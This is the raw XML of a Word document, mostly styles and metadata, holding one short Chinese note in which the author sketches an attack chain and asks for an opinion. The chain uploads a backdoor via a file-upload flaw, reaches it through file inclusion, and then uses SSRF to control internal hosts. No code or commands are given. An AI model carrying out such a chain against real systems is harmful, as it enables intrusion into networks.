    <w:p w14:paraId="5FD15FFF" w14:textId="7E5CAE99" w:rsidR="00020FE2" w:rsidRDefault="00020FE2" w:rsidP="00A72811"/>
    <w:p w14:paraId="44A3122D" w14:textId="3EFD2615" w:rsidR="00020FE2" w:rsidRDefault="00020FE2" w:rsidP="00A72811"/>
    <w:p w14:paraId="10AAD663" w14:textId="04EF56E1" w:rsidR="00020FE2" w:rsidRDefault="00020FE2" w:rsidP="00A72811"/>
    <w:p w14:paraId="6CE4B114" w14:textId="1C6A4713" w:rsidR="00020FE2" w:rsidRDefault="00020FE2" w:rsidP="00A72811"/>
    <w:p w14:paraId="343572A7" w14:textId="11A79A4C" w:rsidR="00020FE2" w:rsidRDefault="00020FE2" w:rsidP="00A72811">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的一个想法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D7155F" w14:textId="4E5790AE" w:rsidR="00020FE2" w:rsidRDefault="00020FE2" w:rsidP="00A72811">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过文件上传上传后门，文件包含漏洞能够连接后门，然后通过服务器SSRF就可以给内网的主机进行进一步的控制。怎么说</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10563662" w14:textId="567118E7" w:rsidR="00020FE2" w:rsidRDefault="00020FE2" w:rsidP="00A72811"/>
    <w:p w14:paraId="4BD544D0" w14:textId="77777777" w:rsidR="00020FE2" w:rsidRDefault="00020FE2" w:rsidP="00A72811">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F4BABF" w14:textId="4EACFAAB" w:rsidR="009C3AE8" w:rsidRDefault="009C3AE8" w:rsidP="00A72811"/>
    <w:p w14:paraId="5D193E52" w14:textId="2C78C594" w:rsidR="009C3AE8" w:rsidRDefault="009C3AE8" w:rsidP="00A72811"/>
    <w:p w14:paraId="304086EC" w14:textId="77777777" w:rsidR="009C3AE8" w:rsidRPr="009C3AE8" w:rsidRDefault="009C3AE8" w:rsidP="00A72811">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009C3AE8" w:rsidRPr="009C3AE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2139CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0784B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B241B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2144B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996900"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C4E7B7E"/>
    <w:lvl w:ilvl="0" w:tplc="3B70CC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5CB2"/>
    <w:rsid w:val="00020FE2"/>
    <w:rsid w:val="004935FF"/>
    <w:rsid w:val="004B6247"/>
    <w:rsid w:val="00644746"/>
    <w:rsid w:val="007513D7"/>
    <w:rsid w:val="0075253C"/>
    <w:rsid w:val="008318CF"/>
    <w:rsid w:val="009C3AE8"/>
    <w:rsid w:val="00A72811"/>
    <w:rsid w:val="00AF35F6"/>
    <w:rsid w:val="00C35CB2"/>
    <w:rsid w:val="00D71AC9"/>
    <w:rsid w:val="00D82AC6"/>
    <w:rsid w:val="00E14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8F7D494"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{486F15F5-8CCE-44DF-AF5E-F2D2CD5CD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3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008318CF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44746"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ds-markdown-paragraph">
    <w:name w:val="ds-markdown-paragraph"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="008318C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4">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008318CF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008318CF"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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8318CF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d813de27">
    <w:name w:val="d813de27"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="008318CF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008318CF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8318CF"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="008318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9477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64715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3234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774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6106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81790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634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0414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889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215714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79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959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415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244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4</Pages>
  <Words>606</Words>
  <Characters>2206</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>105</Lines>
  <Paragraphs>73</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2739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梁 张</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>梁 张</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-13T13:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-15T13:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>